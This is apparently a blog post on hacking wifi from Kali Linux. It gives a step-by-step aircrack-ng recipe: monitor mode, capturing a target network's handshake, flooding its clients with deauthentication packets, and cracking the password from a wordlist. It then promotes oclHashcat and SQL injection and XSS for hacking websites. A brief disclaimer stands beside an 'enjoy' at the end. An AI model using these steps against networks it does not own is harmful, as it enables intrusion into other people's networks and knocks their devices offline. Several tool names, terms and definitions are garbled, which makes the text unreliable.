Kali Linux hacking problem in virtual box?
I think some people have a problem to hack wifi in Kali Linux from the virtual box. Don't worry I already faced it. External LAN is not working there. Just leave or delete virtual box and make a bootable pen drive
How to create bootable pen drive of Kali Linux?
1. Download Win3 diskImager.
2. You already have Kali Linux.
3. Make bootable pen drive by using iso file of Kali Linux
4. Just boot it and run it live or install it.
Now your problem is solved. I have faced the same problem and I used this method. It's working. Now I am able to hack wifi password.
Note-If you have any problem regarding this then just leave a comment. I will definitely reply.
Most read- Through this tip, I am not teaching you to do illegal things. So don't misuse Kali Linux by hacking some others wifi.
Some Hacking steps through aircrack-ng
1. Start monitor mode in your WLAN
a. airmon-ng start wlan0(use you wifi adapter)
b.airmon-ng start wlan0mon
2. Now it time to see wifi network and to hack-
a type ( airodump-ng wlan0mon)
3. Time to capture cap.file
a type ( airodump-ng --bssid (mac address) -c (type wifi channel) -w (name of your choice) wlan0mon
ex-airodump-ng --bssid A0:78:23:23:23 -c 6 -w hand wlan0mon
4.Send deauth package
a type ( aireplay-ng --deauhth 1000 -a (mac address) -c(connected clients) wlan0mon
5. At last ( aircrack-ng -w (you wordlist directory) (Cap file) and press enter
6. enjoy
Language we should know for Hacking
Python: Ask from any hacker. Every hacker must recommend Python. It is so easy and powerful. Here is Python course for beginners. After completing you will able to read or write any Python syntax. Moreover Hacking, Python also helps in data science.
Then you can’t hack anything using python for Hacking websites then you have to learn SQL injection, XSS.
Now don’t search on google learn SQL injection because for understanding SQL injection you have knowledge of SQL Database, PHP, Javascript, CSS, and HTML. This is a long process.
Types of Hacker: There are three types of Hacker
- Blackhat Hacker: These hackers are criminals they miss use hacking knowledge.
- White hat hacker: These hackers are an ethical hacker, or they use their knowledge for protecting computers
- Gray hat hacker: This type of hacker work for money, or you can they work like both white hat and gray hat hackers.
6 oclHashcat
Number 6 in our Top 10 Wifi Hacking Tools is oclHashcat. oclHashcat is not an enthusiastic WiFi hacking tool and it does not encompass with black Linux, but it can attack cruel force and dictionary attacks on capture handshakes while using a GPU.
After capturing the WPA handshake, using the Aircrack-NG Suite, or any other tool, you can crack it using oaklashat using its own GPU. Using a GPU with oclHashcat instead of a CPU with Aclrack-ng, the cracking process will be very fast. An average GP can attempt around 50,000 combinations per second with oclHashcat.
oclHashcat is available for Windows and Linux and has a version for AMD and Nvidia video cards. AMD video cards require a catalyst 14.9 and in fact, Nvidia video cards are required to work in Forceware 346.x or later
0 komentar: